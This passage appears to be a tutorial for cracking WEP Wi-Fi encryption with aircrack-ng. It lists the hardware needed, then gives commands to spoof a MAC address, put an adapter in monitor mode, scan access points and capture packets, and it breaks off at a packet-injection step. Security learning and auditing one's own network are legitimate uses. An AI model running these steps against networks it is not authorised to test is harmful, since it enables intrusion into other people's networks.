Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you. Requirements - Backtrack (or Linux with aircrack-ng installed) - Virtual machine (e.g. Vmware or Virtualbox) - USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode . It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box. Commands airmon-ng stop wlan0 ifconfig wlan0 down macchanger -m 00:11:22:33:44:55 wlan0 ifconfig wlan0 up airmon-ng start wlan0 ifconfig mon0 down macchanger -r (random mac) mon0 ifconfig mon0 up airodump-ng mon0 (scan for APs) Wait for a minute CTRL + C (stop scanning) Pick your own AP with WEP encryption airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0 -w file, in which the data will be saved. —You need around 10k of data to successfully crack WEP— Open another console aireplay-ng -1 0 -a (BSS